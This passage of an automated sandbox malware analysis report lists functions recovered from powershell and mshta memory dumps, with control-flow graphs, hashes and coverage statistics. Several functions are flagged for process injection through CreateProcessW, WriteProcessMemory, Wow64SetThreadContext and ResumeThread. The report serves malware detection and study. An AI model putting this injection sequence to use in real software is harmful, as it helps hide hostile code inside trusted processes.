                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (b]$XhL$XhL
                                                                                                                                                                                                                      • API String ID: 0-479436562
                                                                                                                                                                                                                      • Opcode ID: a770cdac8131c1788920a26c010cf70bb0cf838fde613b046835ffe3ba3cf18a
                                                                                                                                                                                                                      • Instruction ID: fe4b5eba6c2981d0d6b7fb4adc37d9da321053bace058d9a7f3e6514450b5221
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a770cdac8131c1788920a26c010cf70bb0cf838fde613b046835ffe3ba3cf18a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B72E120A0DBCA0FE757A73858642B5BFE1EF57254B1901EBD08EC71B3DA18AC59C391
                                                                                                                                                                                                                      Function 000007FE8992D14D Relevance: 1.8, APIs: 1, Instructions: 346COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 154 7fe8992d14d-7fe8992d1d0 155 7fe8992d1ef-7fe8992d2bd 154->155 156 7fe8992d1d2-7fe8992d1e1 154->156 161 7fe8992d2cf-7fe8992d2d4 155->161 162 7fe8992d2bf-7fe8992d2cc 155->162 157 7fe8992d1e3-7fe8992d1eb 156->157 158 7fe8992d1ec-7fe8992d1ed 156->158 157->158 158->155 163 7fe8992d2f2-7fe8992d31d 161->163 164 7fe8992d2d6-7fe8992d2e6 161->164 162->161 165 7fe8992d31f-7fe8992d333 163->165 166 7fe8992d2e8-7fe8992d2f0 163->166 164->163 167 7fe8992d336-7fe8992d411 CreateProcessW 165->167 166->167 169 7fe8992d413 167->169 170 7fe8992d419-7fe8992d4a5 call 7fe8992d4a6 167->170 169->170
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 05d551366256a02dc161c28c257340c25309e5e1c96192cf53f05a91a44de061
                                                                                                                                                                                                                      • Instruction ID: 0bb3765844e35ca11f32ed75bd400ec5f16b625ddfc8bf00292663cb42a82501
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05d551366256a02dc161c28c257340c25309e5e1c96192cf53f05a91a44de061
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31C1C47180CB988FDB56DF68D855AD97BF0FF5A310F0542DBD049D72A2CA30A985CB82
                                                                                                                                                                                                                      Function 000007FE899261C8 Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 177 7fe899261c8-7fe8992d2bd 180 7fe8992d2cf-7fe8992d2d4 177->180 181 7fe8992d2bf-7fe8992d2cc 177->181 182 7fe8992d2f2-7fe8992d31d 180->182 183 7fe8992d2d6-7fe8992d2e6 180->183 181->180 184 7fe8992d31f-7fe8992d333 182->184 185 7fe8992d2e8-7fe8992d2f0 182->185 183->182 186 7fe8992d336-7fe8992d411 CreateProcessW 184->186 185->186 188 7fe8992d413 186->188 189 7fe8992d419-7fe8992d4a5 call 7fe8992d4a6 186->189 188->189
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                                                      • Opcode ID: 04ac3cb51e9d9144d08b058d29617793c53aa0dd04071985bb8df0a5c349137d
                                                                                                                                                                                                                      • Instruction ID: 328f7cd1bb861aaadb5944682dea4ac3c66437f97b108439a0c7fd311e9ceba8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04ac3cb51e9d9144d08b058d29617793c53aa0dd04071985bb8df0a5c349137d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87915B30918A5C8FDB69EF58D845BEDBBF1FB58710F10429AD04EE3261CB70A9858B81
                                                                                                                                                                                                                      Function 000007FE8992D824 Relevance: 1.6, APIs: 1, Instructions: 140injectionCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 196 7fe8992d824-7fe8992d82b 197 7fe8992d836-7fe8992d8c0 196->197 198 7fe8992d82d-7fe8992d835 196->198 201 7fe8992d8c2-7fe8992d8c7 197->201 202 7fe8992d8ca-7fe8992d90f WriteProcessMemory 197->202 198->197 201->202 203 7fe8992d911 202->203 204 7fe8992d917-7fe8992d941 202->204 203->204
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                      • Opcode ID: 60275080eae79e8fe8a26900ed5189d6dde79054714de14f552e8db96680e576
                                                                                                                                                                                                                      • Instruction ID: 0c132d2a86f7c6c58973803ea91cfa2d952b1a51ae4216e80fb34127d12e92b0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60275080eae79e8fe8a26900ed5189d6dde79054714de14f552e8db96680e576
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D931093190CB588FDB18DF9898467F97BE0FB99321F00426FE089D3252CB74A845CB91
                                                                                                                                                                                                                      Function 000007FE8992D515 Relevance: 1.6, APIs: 1, Instructions: 133threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 205 7fe8992d515-7fe8992d521 206 7fe8992d523-7fe8992d52b 205->206 207 7fe8992d52c-7fe8992d5b5 205->207 206->207 210 7fe8992d5bf-7fe8992d5f1 Wow64SetThreadContext 207->210 211 7fe8992d5b7-7fe8992d5bc 207->211 212 7fe8992d5f3 210->212 213 7fe8992d5f9-7fe8992d620 210->213 211->210 212->213
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                      • Opcode ID: 6f7294798e9e0a41a9aae942ec551ea4238ac5565a66bbce8c53373895365bf5
                                                                                                                                                                                                                      • Instruction ID: 8e72814e46cce0b08040f0918975559678d4a198d60c6e85ab01c6f8e525357f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f7294798e9e0a41a9aae942ec551ea4238ac5565a66bbce8c53373895365bf5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7341063190CB988FDB16DF688845BE97FE0EB56320F08429BD088C7167D764A809CB92
                                                                                                                                                                                                                      Function 000007FE89926228 Relevance: 1.6, APIs: 1, Instructions: 125injectionCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 214 7fe89926228-7fe8992d8c0 217 7fe8992d8c2-7fe8992d8c7 214->217 218 7fe8992d8ca-7fe8992d90f WriteProcessMemory 214->218 217->218 219 7fe8992d911 218->219 220 7fe8992d917-7fe8992d941 218->220 219->220
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                      • Opcode ID: e19c79fcb21581085e88634f5b2898b7c2d83b7f03bec85c03a8dbfbb2ed8b6c
                                                                                                                                                                                                                      • Instruction ID: a0fd5fd59ef91d9c2c759a775a8d08fd1a4d6c15ae709c3c3d6d1dae44e1f957
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e19c79fcb21581085e88634f5b2898b7c2d83b7f03bec85c03a8dbfbb2ed8b6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF31C43091CB588FDB18DF9C98457F97BE4FBA9711F00826FE089D3252CB70A8458B91
                                                                                                                                                                                                                      Function 000007FE899261E8 Relevance: 1.6, APIs: 1, Instructions: 106threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 221 7fe899261e8-7fe8992d5b5 224 7fe8992d5bf-7fe8992d5f1 Wow64SetThreadContext 221->224 225 7fe8992d5b7-7fe8992d5bc 221->225 226 7fe8992d5f3 224->226 227 7fe8992d5f9-7fe8992d620 224->227 225->224 226->227
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                      • Opcode ID: 37c25bef211f0bd06aff2a0865f3128abc515dad3c6b23f38f7338c1459cb887
                                                                                                                                                                                                                      • Instruction ID: 8810abe58bbcfad6b47c1bc258bba850f006e3b49662def33ad161dd46473a88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37c25bef211f0bd06aff2a0865f3128abc515dad3c6b23f38f7338c1459cb887
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A31F53190CB1C8FDB58DF9CD889BEA7BE5FB59720F04825BD449C3126DB70A9068B91
                                                                                                                                                                                                                      Function 000007FE8992D9E5 Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 228 7fe8992d9e5-7fe8992da89 ResumeThread 231 7fe8992da91-7fe8992daad 228->231 232 7fe8992da8b 228->232 232->231
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                      • Opcode ID: ce53ebc5bf481e156900507b0f19ca2a83c63597e3c1716257b87c3a4a5829fb
                                                                                                                                                                                                                      • Instruction ID: 7ef275238a705fde49e5ad42dc4d63e12fdf61d6a9d90c0e0636392456d454e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce53ebc5bf481e156900507b0f19ca2a83c63597e3c1716257b87c3a4a5829fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21057190CA4C9FDB59DB58D846BF97BE0FB96320F00421FD089C3662C7716856CB91
                                                                                                                                                                                                                      Function 000007FE89926258 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 233 7fe89926258-7fe8992da89 ResumeThread 236 7fe8992da91-7fe8992daad 233->236 237 7fe8992da8b 233->237 237->236
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                      • Opcode ID: 4ae6cf666df1091b2668ac85a26992e6f609b91923a7ab8f646d25f85beec7b9
                                                                                                                                                                                                                      • Instruction ID: 990d6c6a9dd2dc409d2643c752b5eb3a9a1f64dc345eed176e5005d080191bae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ae6cf666df1091b2668ac85a26992e6f609b91923a7ab8f646d25f85beec7b9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF21D33090CA4C9FDB58DB58C849BF9BBE0FB65320F10421ED04AD3661C771A426CB91
                                                                                                                                                                                                                      Function 000007FE899F3979 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 238 7fe899f3979-7fe899f398f 239 7fe899f3991-7fe899f399f 238->239 240 7fe899f39a9-7fe899f39af 238->240 239->240 243 7fe899f39a1-7fe899f39a7 239->243 241 7fe899f3aae-7fe899f3ab8 240->241 242 7fe899f39b5-7fe899f39b8 240->242 246 7fe899f3aba-7fe899f3aca 241->246 247 7fe899f3acb-7fe899f3adb 241->247 244 7fe899f3a01 242->244 245 7fe899f39ba-7fe899f39cd 242->245 243->240 248 7fe899f3a03-7fe899f3a05 244->248 255 7fe899f39d3-7fe899f39dd 245->255 256 7fe899f3b19-7fe899f3bc1 245->256 249 7fe899f3ae8-7fe899f3b16 247->249 250 7fe899f3add-7fe899f3ae1 247->250 248->241 253 7fe899f3a0b-7fe899f3a0e 248->253 249->256 250->249 253->241 257 7fe899f3a14-7fe899f3a17 253->257 258 7fe899f39df-7fe899f39ec 255->258 259 7fe899f39f6-7fe899f39ff 255->259 278 7fe899f3bc3-7fe899f3bc9 256->278 279 7fe899f3bcd-7fe899f3bd9 256->279 257->241 260 7fe899f3a1d-7fe899f3a5b 257->260 258->259 261 7fe899f39ee-7fe899f39f4 258->261 259->248 260->241 267 7fe899f3a5d-7fe899f3a63 260->267 261->259 269 7fe899f3a82-7fe899f3a98 267->269 270 7fe899f3a65-7fe899f3a72 267->270 273 7fe899f3a9e-7fe899f3aad 269->273 270->269 271 7fe899f3a74-7fe899f3a80 270->271 271->269 278->279 280 7fe899f3be5-7fe899f3bf9 279->280 281 7fe899f3bdb-7fe899f3be1 279->281 282 7fe899f3c13-7fe899f3c64 280->282 283 7fe899f3bfb-7fe899f3c12 280->283 281->280 284 7fe899f3c66-7fe899f3ca8 282->284 285 7fe899f3cab-7fe899f3cb5 282->285 283->282 284->285 286 7fe899f3cc0-7fe899f3cd0 285->286 287 7fe899f3cb7-7fe899f3cbf 285->287 288 7fe899f3cd2-7fe899f3cd6 286->288 289 7fe899f3cdd-7fe899f3d0b 286->289 288->289
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b1c29d2957070c2f056ec7b10649ca363d6755d067e9331ae9f6c390d29db866
                                                                                                                                                                                                                      • Instruction ID: e61b166141add97a5f6e9a4dd401d43f131cfe74e2b59cd1278c1b8e4e84f876
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1c29d2957070c2f056ec7b10649ca363d6755d067e9331ae9f6c390d29db866
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D12420A0DBC94FE75AA73C98112797FD1EF87254F1901EBD08EC71B3D619A816C392
                                                                                                                                                                                                                      Function 000007FE899F2E74 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 292 7fe899f2e74-7fe899f2e8a 293 7fe899f2ea3-7fe899f2ea8 292->293 294 7fe899f2e8c-7fe899f2e99 292->294 296 7fe899f2eae-7fe899f2eb1 293->296 297 7fe899f2fc3-7fe899f2fcd 293->297 294->293 295 7fe899f2e9b-7fe899f2ea1 294->295 295->293 300 7fe899f2eb3-7fe899f2ec6 296->300 301 7fe899f2ec8 296->301 298 7fe899f2fde-7fe899f2fee 297->298 299 7fe899f2fcf-7fe899f2fdd 297->299 303 7fe899f2ff0-7fe899f2ff4 298->303 304 7fe899f2ffb-7fe899f3027 298->304 305 7fe899f2eca-7fe899f2ecc 300->305 301->305 303->304 305->297 306 7fe899f2ed2-7fe899f2ed5 305->306 307 7fe899f2ed7-7fe899f2eea 306->307 308 7fe899f2eec 306->308 310 7fe899f2eee-7fe899f2ef0 307->310 308->310 310->297 311 7fe899f2ef6-7fe899f2ef9 310->311 312 7fe899f2f10 311->312 313 7fe899f2efb-7fe899f2f0e 311->313 314 7fe899f2f12-7fe899f2f14 312->314 313->314 314->297 315 7fe899f2f1a-7fe899f2f20 314->315 316 7fe899f2f22-7fe899f2f2f 315->316 317 7fe899f2f3c-7fe899f2f49 315->317 316->317 318 7fe899f2f31-7fe899f2f3a 316->318 319 7fe899f2f4b-7fe899f2f56 317->319 320 7fe899f2f5d-7fe899f2f6d 317->320 318->317 319->320 321 7fe899f2f6f-7fe899f2f7a 320->321 322 7fe899f2f81-7fe899f2f8a 320->322 321->322 324 7fe899f2f91-7fe899f2f9a 322->324 325 7fe899f2fb3-7fe899f2fc2 324->325 326 7fe899f2f9c-7fe899f2fa9 324->326 326->325 327 7fe899f2fab-7fe899f2fb1 326->327 327->325
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8a8d2dc171a316370f640f9cc79698893edafcb4110b372607e41c1f20257b15
                                                                                                                                                                                                                      • Instruction ID: d95fffec51c2b583470aaf001367e042558e16b771a18ba5e1de18be8d114750
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a8d2dc171a316370f640f9cc79698893edafcb4110b372607e41c1f20257b15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F513731A2DBC74FE75A932CA85077CBBD1EF65690F2811BAC08EC31B2D624EC658350
                                                                                                                                                                                                                      Function 000007FE899F34C0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 329 7fe899f34c0-7fe899f34c8 330 7fe899f3500-7fe899f3509 329->330 331 7fe899f34ca-7fe899f34e4 329->331 332 7fe899f3522-7fe899f352f 330->332 333 7fe899f350b-7fe899f3518 330->333 337 7fe899f3530-7fe899f353a 331->337 338 7fe899f34e6-7fe899f34f1 331->338 333->332 335 7fe899f351a-7fe899f3520 333->335 335->332 340 7fe899f3549-7fe899f3559 337->340 341 7fe899f353c-7fe899f3548 337->341 342 7fe899f34f8-7fe899f34f9 338->342 343 7fe899f3566-7fe899f358c 340->343 344 7fe899f355b-7fe899f355f 340->344 342->330 344->343
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b8336fb412933c573a57f907f2746a642de8eaed22a6af92bfe7d65df4698eb7
                                                                                                                                                                                                                      • Instruction ID: 7014d78c7fdbcb7ca1706ad73d7a3ef48fb450e6d061c8cc59c6f60137eb1c4a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8336fb412933c573a57f907f2746a642de8eaed22a6af92bfe7d65df4698eb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E721EA31F1CA994EEB95A32C64162F8F7D2FB99694F5801B7C04EC31B6DA19EC158381
                                                                                                                                                                                                                      Function 000007FE899F34E1 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7cc0a021717c43290abeb121464abf221d6e6f150956630a7cd2e6485ae292bb
                                                                                                                                                                                                                      • Instruction ID: cf75fa584add40b0ff3c61ce13efd608192cee12e7c343d3916467e9795f42c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cc0a021717c43290abeb121464abf221d6e6f150956630a7cd2e6485ae292bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F0E921E0D9DA0EE795A32C24052F4AA81EF55150B1801B7C48EC35B3D914DC244381

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 03670FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000003.473532683.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 03670FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000003.473532683.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 03670FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000003.473532683.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:6.5%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:2.6%
                                                                                                                                                                                                                      Total number of Nodes:1687
                                                                                                                                                                                                                      Total number of Limit Nodes:24
